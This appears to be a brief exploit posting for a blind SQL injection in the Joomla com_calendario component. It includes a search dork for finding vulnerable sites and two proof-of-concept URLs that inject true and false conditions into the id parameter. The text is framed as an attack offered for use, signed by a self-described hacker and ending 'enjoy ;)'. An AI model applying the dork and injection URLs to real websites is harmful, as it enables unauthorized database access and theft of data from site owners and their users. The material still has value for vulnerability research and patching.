The Joomla Calendario component suffers from a remote blind SQL injection vulnerability.
14b6721bae2cef47826883ea7ab3bb74aea626efca4602c9e7f0043dab183d57
Joomla Component com_calendario Blind SQL injection Vulnerability
author : Mr.tro0oqy --> yemeni hacker
email : t.4@windowslive.com
dork: inurl:index.php?option=com_calendario
exp :
http://www.target.com/index.php?option=com_calendario&task=detalhes&Itemid=88&id=297+and+1=1 true
http://www.target.com/index.php?option=com_calendario&task=detalhes&Itemid=88&id=297+and+1=0 false
enjoy ;)